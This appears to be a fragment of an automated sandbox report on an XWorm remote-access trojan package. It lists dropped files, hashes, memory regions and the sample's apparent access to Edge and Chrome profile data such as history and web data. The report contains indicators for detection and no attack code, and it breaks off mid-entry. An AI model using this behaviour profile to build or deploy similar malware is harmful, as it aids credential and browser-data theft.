| MD5 | b8703418e6c3d1ccd83b8d178ab9f4c9 |
| SHA1 | 6fb0e1e0ee5bc745f52a1c29e3cf4b88a2298dd6 |
| SHA256 | d6e9972976881d3dad7ac2a0c66cd7dd81420908aae8b00195a02fdf756cfc5e |
| SHA512 | 75ff6e911691e3d0d32c25d4b6d275a2b6157dae418ce5507f3e3f1b321c3f0dee516b7db0fd6588860019a19862f43c5335c465829de7a418a71999b71cfc3f |
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe:Zone.Identifier
| MD5 | 640d524e902154387c7753caa8f354cd |
| SHA1 | f26c3bd6504c691049b70127acd4541d0bb121f5 |
| SHA256 | 44343939c5c0e594f307bcb9fc79669ea0213df316d5f3b4a557afa8acf2d665 |
| SHA512 | 0eab3ce3739eb6bcf5055381c6718744e743e62e0069b80afdc3710dc46c7672b469aad84c566fd48006b7e6667b5e5f223adf496052155c259126718fa1bcd7 |
memory/1184-593-0x00000000743A0000-0x0000000074B51000-memory.dmp
memory/1908-595-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp
memory/1908-594-0x0000014039C00000-0x000001403A1A0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll
| MD5 | 65ccd6ecb99899083d43f7c24eb8f869 |
| SHA1 | 27037a9470cc5ed177c0b6688495f3a51996a023 |
| SHA256 | aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4 |
| SHA512 | 533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d |
memory/1908-601-0x0000014054740000-0x00000140547B6000-memory.dmp
memory/1908-602-0x0000014054730000-0x0000014054740000-memory.dmp
memory/1908-603-0x000001403A670000-0x000001403A68E000-memory.dmp
memory/1908-611-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp3771.tmp.bat
| MD5 | f707475f6adc528f4ee6820749405e7a |
| SHA1 | 2b160ebaf73acead8b48e87862d1ccccabe50ac0 |
| SHA256 | 474a14c16621941cc5ab64ea6ee2f78c823078cc5e27f2da12e3ec77bfa999de |
| SHA512 | caee0f74edfda2cba961f231484e8d5aa3c2a4769bce420069c48fdec8b5b6a1b771cbd9413579057d78f439361e9c6723a2589ec66906675e7b4d8cb8f31f43 |
memory/3016-615-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp
memory/3016-618-0x0000015941750000-0x0000015941760000-memory.dmp
memory/2392-620-0x00000000743A0000-0x0000000074B51000-memory.dmp
memory/2392-619-0x0000000000740000-0x000000000092A000-memory.dmp
memory/2392-621-0x00000000052A0000-0x0000000005332000-memory.dmp
memory/2392-622-0x0000000005340000-0x00000000053DC000-memory.dmp
memory/2392-623-0x00000000053F0000-0x0000000005456000-memory.dmp
memory/2392-624-0x0000000005510000-0x0000000005520000-memory.dmp
memory/2392-625-0x0000000006300000-0x000000000630A000-memory.dmp
memory/2392-626-0x0000000006540000-0x0000000006764000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1a5fdae6-8f46-4b8b-a738-d6572f690d43\AgileDotNetRT.dll
| MD5 | 14ff402962ad21b78ae0b4c43cd1f194 |
| SHA1 | f8a510eb26666e875a5bdd1cadad40602763ad72 |
| SHA256 | fb9646cb956945bdc503e69645f6b5316d3826b780d3c36738d6b944e884d15b |
| SHA512 | daa7a08bf3709119a944bce28f6ebdd24e54a22b18cd9f86a87873e958df121a3881dcdd5e162f6b4e543238c7aef20f657c9830df01d4c79290f7c9a4fcc54b |
memory/2392-634-0x0000000072DA0000-0x0000000072E2A000-memory.dmp
memory/2392-635-0x0000000005510000-0x0000000005520000-memory.dmp
memory/2392-636-0x0000000005510000-0x0000000005520000-memory.dmp
memory/3016-637-0x0000015943110000-0x000001594311A000-memory.dmp
memory/3016-638-0x000001595BEB0000-0x000001595BF1A000-memory.dmp
memory/3016-640-0x000001595C8A0000-0x000001595C952000-memory.dmp
memory/3016-641-0x000001595C9A0000-0x000001595C9F0000-memory.dmp
memory/3016-642-0x000001595C950000-0x000001595C972000-memory.dmp
memory/3016-644-0x000001595CA30000-0x000001595CA6A000-memory.dmp
memory/3016-645-0x000001595C9F0000-0x000001595CA16000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History
| MD5 | 12a21eb44a2ab50f137c6f9450517a5b |
| SHA1 | 01b4c3bc7267a3679b6155a04c28994fde11fe70 |
| SHA256 | 4986256bdd93a6909d366aed1d5d9cfa294977eba2849964cde5e3a7de2c4460 |
| SHA512 | a459a1bcbe3671e0d798415fb78c59dfcd5a7e63e00dae2805b1921f21289f197885a6b7be7b0e1e8563c55445f386b17bbd6943e318a4ab3c5f624966e90591 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data
| MD5 | cee3c16a92f3ae390c4e75fd88c28056 |
| SHA1 | 38094e5ca91a5f45bf10f7c4806cc78c512cd32b |
| SHA256 | 816cfe2684e18854e81448ccac7abecd961cca1cc1fb78c82b3e5bd5c7a9070f |
| SHA512 | 5125a51dcb07c97ca851fa4db7707665624ba940c4ead87aea70696135fe09ac32891c0eea6772eedf25f2a3403456bd4edb8291f76971ee3e5da38508acce3c |
memory/3016-667-0x000001595C980000-0x000001595C992000-memory.dmp
memory/3016-671-0x0000015941750000-0x0000015941760000-memory.dmp
memory/3016-676-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XWorm RAT V2.1.exe.log
| MD5 | f806bfa68f99d4a19d806595611717b6 |
| SHA1 | e83964cc47b297499f0add7d54aa237450fa4744 |
| SHA256 | 2d5ab2f4a9040dcf4444eee974461311f43e017406382778aa8c83a87c0c857a |
| SHA512 | 12e35d2c49733241638c073a64679458fc24a0d06b4db735a0e86883a06167021900b9b3aad8bbb2d6701b61a6d049cc9d02a17de98fd2b1a394b6fb27d86119 |
memory/3016-678-0x0000015941750000-0x0000015941760000-memory.dmp
memory/1884-679-0x00000000743A0000-0x0000000074B51000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 1ba49875f796d1a52b1610256883bc1a |
| SHA1 | a80aeb33640a76f2165223d9335aa6e3005cfa8d |
| SHA256 | 0f0272e587441d8426f20a514649532163dbfd3371aecfd21ddb4c81f10d5801 |
| SHA512 | eda00d0531758cf15caa37589a2a016780ff713442fce7ec30fe9c489137fa02aa1f5606ae58e24428f1459f72eb02236efed2e3e6284b2d02c508c02370ad36 |
memory/2392-700-0x00000000743A0000-0x0000000074B51000-memory.dmp
memory/2392-711-0x0000000005510000-0x0000000005520000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Command Reciever.exe.log
| MD5 | f6124be7822087101cfaca65733653f4 |
| SHA1 | cc40c3110d3ae90008b0a4930259a0c18bba1703 |
| SHA256 | 4451dab0c07cb97f3f4e71be86ebb6f895b139a13a6c1df97ca5028a216f6925 |
| SHA512 | f4bc2d963e9aecc93cb2d602b94c95521d461483665d128d0d4b7266b5686691973e6496706d9cd35816cd946a38c9c1c6482b80c264588eefdfafb69ac59835 |
memory/2392-712-0x0000000005510000-0x0000000005520000-memory.dmp
memory/2132-713-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp
memory/1884-714-0x00000000743A0000-0x0000000074B51000-memory.dmp
memory/2392-716-0x0000000005510000-0x0000000005520000-memory.dmp
memory/2392-722-0x0000000005510000-0x0000000005520000-memory.dmp
memory/2132-724-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp9AFE.tmp.bat
| MD5 | 372f5beacd09339c63ef9cd5ed724628 |
| SHA1 | 653c569cbb98c62ad198c6e974a402b01690e25b |
| SHA256 | d97292aae3be8601c699c2f066c290b378f3f92b18dcfcd44d11cf23549a6f95 |
| SHA512 | 722c631b01ea81b6944835b7daaea0fccf55f8413e74ea56126bb07c1f76f19df4dac8008456e5c788fc7ec3f435fc8eef1a300a7fe698854439fd03c6de50f6 |
memory/3016-727-0x0000015941750000-0x0000015941760000-memory.dmp
memory/4348-728-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp
memory/4348-731-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp
memory/2392-732-0x000000000BAC0000-0x000000000BBE0000-memory.dmp
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe
| MD5 | b46353715bb880e30d84414b335b6fd8 |
| SHA1 | 107b40a28744a1e3e3a99497070664d483877f04 |
| SHA256 | 6eab6250d1f51a740b8a298dc7dddb43787221d5bfcd4b60be2127b74af2f98c |
| SHA512 | 3cba43192f05843da9e01b8167d35c2c886f60004182988c5bea024e38c7c5a94b1b1f245356559e535159f4b254bcebe572d395d1fce75469474036d3c882ea |
memory/2840-737-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp
memory/2840-736-0x0000000000300000-0x0000000000316000-memory.dmp
memory/2840-738-0x000000001B2E0000-0x000000001B2F0000-memory.dmp
memory/2952-739-0x0000000000400000-0x0000000000416000-memory.dmp
memory/2840-741-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp
memory/2952-742-0x00000000743A0000-0x0000000074B51000-memory.dmp
memory/2952-743-0x0000000005B20000-0x0000000005B30000-memory.dmp
memory/2392-747-0x0000000005F60000-0x0000000005F74000-memory.dmp
memory/2952-748-0x00000000743A0000-0x0000000074B51000-memory.dmp
memory/2952-749-0x0000000005B20000-0x0000000005B30000-memory.dmp
memory/3156-755-0x0000000009010000-0x00000000097CA000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 6bc408666fcaf29a881bb1e206a2e990 |
| SHA1 | a00e5d564651d930e48632519d6f467c0df5b485 |
| SHA256 | ffdf9debe7e7136aaf5297e7c7d70b49ba93d69b0156d87d1cf53338230a268e |
| SHA512 | e7fa33526e6c0df4485bd794b97e0b600ebab8b33ab945de3a751e70a99c82134f5f6dead9e363de155135f5190a380036328dc585f922468d058d76ef1a1f26 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\4a8beac1-80f9-49c1-8b85-8e7af79a70c1.tmp
| MD5 | a526cb0247e44dab16c82785720581f9 |
| SHA1 | b941a599a87cdbba6a204f727464686d9a3aed58 |
| SHA256 | 5ff1602a8378555f1b1a074062af6108f964b593ab0f9cf7324de257f196e910 |
| SHA512 | c91cae4e20af8f153e139f3f9c745492f240ff7f5e59dc1cacd54913ed4e7da2eebad6cf32d3bbceb66f02ec648e8d0cf6cdfd731bf543a034da0475722f3a32 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 2e6798b7e2f990bb598295638d81db91 |
| SHA1 | 95996ce80f0aedf3fc9ae33b67e2d6d994f6f9dd |
| SHA256 | 7ea97cd51d818429b0c9468dc32b10fa3968d73416023b72ec10825694c5ac08 |
| SHA512 | b01c9912fcdf753cc962fbb9a7eeb47e0c38dbe77c289d2849fcda504a027b16f12b01c3bc4f33e98407b9509f78a4c413cd22e8991ff32d6187c1d9923d4b53 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | a784a3f2156d96e6051801c610c65a7c |
| SHA1 | d9c6e10d0cd17c1056fd956393d8d258a1d2bbc5 |
| SHA256 | 882f5bfad8990a678ddac345639452d39be4e7ba4837238458382615707cb416 |
| SHA512 | 5c707ec82a027d3da0cae9ea0adde12d16f65e0abd4cfdd56b89c49539b03e1d91303070be1708df21c9b40241201f98c09ea56d6d27a884f35525b9388c1e7c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\988afb84-58df-45b5-bc03-b6f0cf0f3f88.tmp
| MD5 | 92dd930f2b5a7fa3a7a49727b89a2c2d |
| SHA1 | 9ca174f88dadc0dead7d275f35175c84f4cec2bc |
| SHA256 | fa682c76e01cf5c63ad5acc58fcf1f51a567dbb5b05e7b5a004ba93df39491b6 |
| SHA512 | 5e16dd5669eb77085a4c1b2197c495512ff583f680f604765e151367f0c769d6fe02a9b9e0531b1d28a4ff5421995cbedd4ce4c2fc0fd35189da963f036014f4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | f589c7638efc1d2a9f24b85da3664a63 |
| SHA1 | ee8f84171f8df24550843c6553f6742a9e628103 |
| SHA256 | 313e27023ce0a27110c095ec9ec2061c54ea937107aef359658fb2ba1d341bdf |
| SHA512 | 3f6a5a8763ddf422aecb7cebd5f07727005578d032c11061cabfdda2d35c3c72f8b11bcf02a034b28875cdc404904a7b105e54556366791519f21f91cfd5a564 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version
| MD5 | 9eae63c7a967fc314dd311d9f46a45b7 |
| SHA1 | caba9c2c93acfe0b9ceb9ab19b992b0fc19c71cf |
| SHA256 | 4288925b0cf871c7458c22c46936efb0e903802feb991a0e1803be94ca6c251d |
| SHA512 | bed924bff236bf5b6ce1df1db82e86c935e5830a20d9d24697efd82ca331e30604db8d04b0d692ec8541ec6deb2225bcc7d805b79f2db5726642198ecf6348b8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Browser
| MD5 | de9ef0c5bcc012a3a1131988dee272d8 |
| SHA1 | fa9ccbdc969ac9e1474fce773234b28d50951cd8 |
| SHA256 | 3615498fbef408a96bf30e01c318dac2d5451b054998119080e7faac5995f590 |
| SHA512 | cea946ebeadfe6be65e33edff6c68953a84ec2e2410884e12f406cac1e6c8a0793180433a7ef7ce097b24ea78a1fdbb4e3b3d9cdf1a827ab6ff5605da3691724 |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\GrShaderCache\data_2
| MD5 | 0962291d6d367570bee5454721c17e11 |
| SHA1 | 59d10a893ef321a706a9255176761366115bedcb |
| SHA256 | ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7 |
| SHA512 | f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\ShaderCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\ShaderCache\data_3
| MD5 | 41876349cb12d6db992f1309f22df3f0 |
| SHA1 | 5cf26b3420fc0302cd0a71e8d029739b8765be27 |
| SHA256 | e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c |
| SHA512 | e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\ShaderCache\data_0
| MD5 | cf89d16bb9107c631daabf0c0ee58efb |
| SHA1 | 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b |
| SHA256 | d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e |
| SHA512 | 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0 |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Crashpad\settings.dat
| MD5 | b72ccf74a88b62706af12d6073b1c4bf |
| SHA1 | af09cb48102a916c3d8e8c678b6b4a3df1a817d3 |
| SHA256 | 937665e0c77b99ac62eecdd3b7a0411db2e3fd4058a9ad45e6c9ae5164849c39 |
| SHA512 | b6424efd8c5e74f3fa0bc881d3ad66dc987cbdaa7d9fc6f778f7828d4d1d92db2a6bd36122f2bcc27702f3e006972acc3f4caea163f3b4b6b41158c6e4f5598b |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\f92323cb-8f12-4c4f-83d1-edf3f02da4ea.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Local State
| MD5 | dcf900280f194aae7a8dad528c5f4510 |
| SHA1 | b7c22c2d96d9b57ebd6fa109cce31fd7f5278dab |
| SHA256 | 6c12842f1905ccd1887e622c2c7cf058c309458b6d5905d90c76764b5bf6344b |
| SHA512 | 405c820e91556598f37f69abdf480c1393ba97bf9789ce73f003b585f543ac0f4dc3fad83b9f71fe09a840f5a000230fbb95f5ad5816300b9a239a1655ec82e2 |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Preferences
| MD5 | b51b73ced77d3220ea83c47fc4fe6bb9 |
| SHA1 | 9b815a93ea9dff8bce0893ac73f5c64e44761e85 |
| SHA256 | c935ad4a619d11bf8bbc93cd1a5b1659c35db8a6a440fd96f64700bced5bc334 |
| SHA512 | 4d4d94d544d5d6b4d0179ca8c8715f7dfa54de64da14713c0b791fdce00e671069e6d9ff706372a78ba20b3d4ebf574ce0b774f7d8813c6b445a7647c1ae7935 |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\TransportSecurity
| MD5 | 6e622bd7de2fc06539e5cfb6d4bc7c16 |
| SHA1 | 842ebb0e63aba88548a5a4a9794c4d7c4a06ee80 |
| SHA256 | 29804baa65c713df1155d25597643a0c4c486ccd3d1a21de15685b263b90668e |
| SHA512 | 7f9dfa5554b702e87019943999ff4788bc2aba6b3b3bb59fc9488bb92b24df5c37cc5b8ff895379db7d8766950e641a730ebc0774171cef0aa6ac479a2999b45 |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Module Info Cache
| MD5 | b0954fb5350a94a10dab45095537f533 |
| SHA1 | 684e24a3a8a2dbfbe394a17be601170b62b38f4c |
| SHA256 | 373c89abeb67c0f3f62799afdca90b403070d0aeb12f960f0d07274c32653f3b |
| SHA512 | bb40905746730e9dbac4373f3767a6f5d0ab2f9a130dd2f91612e82612883c0c6ffb1b7129f92a903ae2b86bbc7ff8aee675f58a6ded31d2ae9088f18d448465 |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 23ca5cba26688757b60ce503cd1ff6c4 |
| SHA1 | 999d8b84b7a9a0ae054b2389480624e4ef747091 |
| SHA256 | fbf732e247eda52ff8b2356405b5a9b596eaedb4b00926543e8f5b595f9f97ca |
| SHA512 | dd1755a649550d172634d612c396f3b077ca052dda64c1db8618b9fc479bbd10ee0bf81c21064d63f60b133a0a8d16f5965152859830cbaff35091e475df6bca |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Code Cache\js\index-dir\the-real-index~RFe5c2070.TMP
| MD5 | 6d5a2baac4f9567d60b5642ae438876f |
| SHA1 | b0e4768d356c2e71ade39b5894fb64c196f436bb |
| SHA256 | cc13c8b7c907e21803ad372efecb2375e7be86f98dfa9be58e259947be0cc625 |
| SHA512 | 1bbb04f639e639f34bcf8fdd341f466fea2a51fc4d67789c5d6808ba41bc106926382b2e0b9530f8b5ae8f471d9a4a27f3a83a397b7905710efe99d16e1db0ba |
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\options.vnc
| MD5 | 24f5e966d65e79745d3303b950496810 |
| SHA1 | 76b05ca8cac7a49bec0c413270e4af5ce891dbf9 |
| SHA256 | 9b7645a27b48ec94958a9a95326860c811b9fb3b9d82901102671e7c64416d3f |
| SHA512 | b77bcc8f62db51c2b120e664d9f78c1896a943d56d4e3fdf7b4520a021458181cf70457ae486b12439905351bac8df875320a02b79b0f8ad4f9eacaa00379c5d |
memory/2652-1414-0x0000000002230000-0x0000000002231000-memory.dmp
memory/2652-1417-0x0000000000400000-0x0000000000502000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\Network Persistent State
| MD5 | 3f48965a65227c6ba62a7bf6aeacda8e |
| SHA1 | 0c874bf5d42076adb21eb3e142a55b3acb36fa38 |
| SHA256 | 06b67add93b9f59744fb9e3c29ddc6fc5b97df0eb0aac36cf8e5b811e0cc31c9 |
| SHA512 | 018b064a6c8bffeeb9f5b78eceaee18f61f441b187f291039eaa2dbb3432e3b917056a5f0b761c2554502cf2aff297c01aede43af794fc79cdb7a67c667726bb |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\TransportSecurity
| MD5 | 8644b46dccaa7c5ada6f9da22054a8d6 |
| SHA1 | 7a32e8e55aad2be949531a771ba38a69f5cc4329 |
| SHA256 | 1169de5762a6513baa32bf475c56fb48c29d3952a1f61b566f1849d2a3bed778 |
| SHA512 | f7a8ea9d669ee0899ad1847d8f3e8f026dceb48f19c298fab02d4a9f9235dc4fb24dc76d9b756212e0cf079c2045622e83ed3803e5e9602b9c39c4faeac74695 |
memory/3016-1452-0x0000015941750000-0x0000015941760000-memory.dmp
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Tools\options.vnc
| MD5 | 856bc6b09dd64a05856ce820c5684934 |
| SHA1 | 8083dbb6450d078e65b13827529b9d61c976c0c8 |
| SHA256 | 09a44d59daf673d23cf41b54ae66c797915a53e3ae0b7c72ecf504918d6b28d8 |
| SHA512 | 8ab164f2d0ed117fe0ac4c86799370f3e580c4ba1af9434986f5c5dd1a2a09999193f53908e96a460b05eb726b955ab9aee062996d52ccdeaddedbf6465c1bec |
memory/3016-1539-0x0000015941750000-0x0000015941760000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 7bea0f508971405600ec62102b0b821b |
| SHA1 | 087fe4520987f512364cec5c523b6b29d9c36bbb |
| SHA256 | fee6ee1b1f8e741dbad62add0bdf396dc4acbd0c486be12382b0c065579e6b70 |
| SHA512 | 6208ff0ca29b7b747b7d82c5c4deb43f0a2ebf539d2c58987ab18382eff21b706c5bb2aa597ee617716310c6e648456d3f151d9d3ed78a1dd2be13a54b364c1d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | c9a6fb74aa1d29cfb0033c26d1b8e146 |
| SHA1 | 0d821bba1975da8fbad900dea0a43960643f9a44 |
| SHA256 | 7bd56093477f1e17114eafd35288dbe76d410616cb09fad47e8d6a3ad35d806a |
| SHA512 | 6db04f427ada78642e5918b355ea73f1aa504d2735073d26d2bf588cece0daf1118fe0d3b892689598c45c7223a53e0467cbba5f0f5e4858187b28f956aaece2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 55dc2c233cab0aca6610a34f0878cb0d |
| SHA1 | 30817dca5b80b045c1719fce1efc5e458b1f3753 |
| SHA256 | f1d91ec4a1aa3ee8bb428a4ffd9ab7d59afa69fcf89768e76e54e90dafe20384 |
| SHA512 | 1609dac3a1f13e5874d39bb1ee9330c8125f4f422f286e3be4a94cb6642802c21df8f1012ec1a6d0bf281a14487cc52fd46bb2cb343be7d91892b6fdfefee35c |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\Network Persistent State
| MD5 | c05680b0d85bde153702f5757a1881ab |
| SHA1 | ad4879b4e88f1ca31e221806380a78208d0d9502 |
| SHA256 | e28f596dc63ca0d7dced7fc67ba233e405a63b513d19604061ceaa2dd4ba47e3 |
| SHA512 | d1b5bddad5f59f8eb84fa850e9119bb51850bc549fc007eeb439af56f9759fb73a2da82eafa96eba293528e85cab886c7e34984a81c1398532c86ad2e7714887 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 487c50a3d57da6e13c6c6189ad49cdf9 |
| SHA1 | 8b7404f365162444ce6b2c356567f89fe5ad25ef |
| SHA256 | 12a0cd034eac5585da9c8522f7f6962f747307af8d0fbe6024db0b1e39237f73 |
| SHA512 | 3b9e0ac0aaa56e7305fd86e6218c9da96db02acd76512c107656f84a5f5733ebf333770f52c0b4b6c8c0cb2624ab74768deaaeb7c106050af84ac44593b6f918 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | aefd77f47fb84fae5ea194496b44c67a |
| SHA1 | dcfbb6a5b8d05662c4858664f81693bb7f803b82 |
| SHA256 | 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611 |
| SHA512 | b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d3a34e57e84c51a05ba3a2fc399a6efa |
| SHA1 | bdb47ffb0b15a5009b1526291a2a22761a4f9b65 |
| SHA256 | 0fa49adbf4719e151d00b04b90bacde8e139b2d0a3497a300d90fb3b3568103f |
| SHA512 | 51e6635eea2b7c81296ed8c5884c61e40d0046551fcddf33612a7d137f1c36362f727bdcf26b0fb23707cadecf09f75be5eaceb08cff211f1b0297ed46cfd681 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | ef4ec162f9c141a98693b6d98f6d65a9 |
| SHA1 | 893edcdc55dc099926b145fe4a8a0284b6b91824 |
| SHA256 | ec03fab4238bb018f5dfd4d0b069430bbe6a9eca2eed75f6cce1e32c544d06d5 |
| SHA512 | 49a7d89acf700fdab4ff6ae598708d9049c49adb24093fe05e82f276da30b51416599b9d67ad1b10c542894333ac19bc87ab7826ea335fb6cd25642ef71aa7d7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6c73a8716c59cfc1719e655b6e2a6112 |
| SHA1 | 05e9b18e72680fb64a456b5023e6f4aafcd1273b |
| SHA256 | 2b0cf9761af95e6cb6734d606869179fb408c8bc2897eebf9fb569b3fc972a74 |
| SHA512 | 5066e137828bc807d5d3d23e92009fe9f8445ba4908470b42e22168e46bea93b57ef19600076c12ed0599495e3134c8b78d4f8ba94e0e49280e18db4a904cf50 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 0f72b3182262e326ecb6b058fbc1067b |
| SHA1 | c6fa80af486b23e030f9d2754d1a311c85ab3b66 |
| SHA256 | 207e3a397484771eb7ae7d1d4ad4dfc3d72697a80674eeea7fe865db2658cb58 |
| SHA512 | a48831754ff66beec5639b5a258bb4dcf64ea1d796e7880aa17d93d1524d7dd11d24d89ecde01d291022e134a4445ff8b47d0d37567041c80680c6d718cf469c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | b7acf7eee9e2f16e42da2b3afa881c06 |
| SHA1 | 88ae41b56e12ec1d909abab9f32d2fb519ddf580 |
| SHA256 | 9aa8872de31a8524af41252b59dc10c0b5a83da1669a3acd95e0761386b5877c |
